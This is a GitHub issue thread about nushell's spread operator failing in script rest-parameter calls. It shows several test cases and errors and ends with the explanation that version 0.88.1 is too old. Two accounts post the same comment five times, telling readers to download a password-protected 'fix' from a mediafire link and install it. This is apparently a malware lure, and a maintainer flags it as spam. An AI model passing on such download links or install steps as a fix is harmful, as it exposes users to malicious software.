### ISSUE TITLE
The spread operator is broken in script

### ISSUE THREAD

**Issue by tnthung** [nushell/nushell#13702]
### Describe the bug

I was following the documentation of the rest parameters part. And the result is so broken that I don't even know if there's any workaround.

```nu
# this is from the doc
def greet [...name: string] {
  print "hello all:"
  for $n in $name {
    print $n
  }
}
```

## Case 1

```nu
def main [] {
	# this is from the doc
	greet earth mars jupiter venus
}
```

This worked as expected, yielding

```
hello all:
earth
mars
jupiter
venus
```

## Case 2

```nu
def main [] {
	# this is also from the doc
    let planets = [earth mars jupiter venus]
    greet moon ...$planets
}
```

This doesn't not work, yielding

```
hello all:
moon
...$planets
```

## Case 3

```nu
def main [] {
    let planets = [earth mars jupiter venus]
    greet moon ...($planets)
}
```

Yielding

```
hello all:
moon
...[earth, mars, jupiter, venus]
```

# Case 4

```nu
def main [] {
    let planets = [earth mars jupiter venus]
    greet moon (...$planets)
}
```

Erroring

```
Error: nu::shell::external_command

  × External command failed
   ╭─[D:\Project\GameServer\ws.nu:4:1]
 4 │     let planets = [earth mars jupiter venus]
 5 │     greet moon (...$planets)
   ·                 ─────┬─────
   ·                      ╰── executable was not found
 6 │ }
   ╰────
  help: program not found
```

# Case 5

```nu
def main [] {
    let planets = [earth mars jupiter venus]
    greet moon ($planets)
}
```

Erroring

```
Error: nu::parser::type_mismatch

  × Type mismatch.
   ╭─[D:\Project\GameServer\ws.nu:4:1]
 4 │     let planets = [earth mars jupiter venus]
 5 │     greet moon ($planets)
   ·                ─────┬────
   ·                     ╰── expected string, found list<string>
 6 │ }
   ╰────
```

# Case 6

```nu
def main [] {
    let planets = [earth mars jupiter venus]
    greet moon $planets
}
```

Erroring

```
Error: nu::parser::type_mismatch

  × Type mismatch.
   ╭─[D:\Project\GameServer\ws.nu:4:1]
 4 │     let planets = [earth mars jupiter venus]
 5 │     greet moon $planets
   ·                ────┬───
   ·                    ╰── expected string, found list<string>
 6 │ }
   ╰────
```

### How to reproduce

1. Just copy any snippet and run.

### Expected behavior

At least Case 2 should work, other cases are me trying the workarounds, and none of them worked.

### Configuration

~> version | transpose key value | to md --pretty                                                                                                                                                                         1 08/27/24 12:36:00 PM
| key                | value                                    |
| ------------------ | ---------------------------------------- |
| version            | 0.88.1                                   |
| branch             |                                          |
| commit_hash        | fd56768fdcc1acbebcb75745600fc7419f72833d |
| build_os           | windows-x86_64                           |
| build_target       | x86_64-pc-windows-msvc                   |
| rust_version       | rustc 1.72.1 (d5c2e9c34 2023-09-13)      |
| rust_channel       | 1.72.1-x86_64-pc-windows-msvc            |
| cargo_version      | cargo 1.72.1 (103a7ff2e 2023-08-15)      |
| build_time         | 2023-12-14 17:53:48 +00:00               |
| build_rust_channel | release                                  |
| allocator          | mimalloc                                 |
| features           | default, sqlite, trash, which, zip       |
| installed_plugins  |                                          |

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kubouch** [comment]
^Deleted spam

**Comment by weirdan** [comment]
> version 	0.88.1

It's way too old. The spread operator for commands (as opposed to list literals) was implemented in 0.89, but there were multiple fixes after that version as well.

**Comment by kubouch** [comment]
Ah, I didn't notice the version. Please report / reopen if you find problems in a recent version.
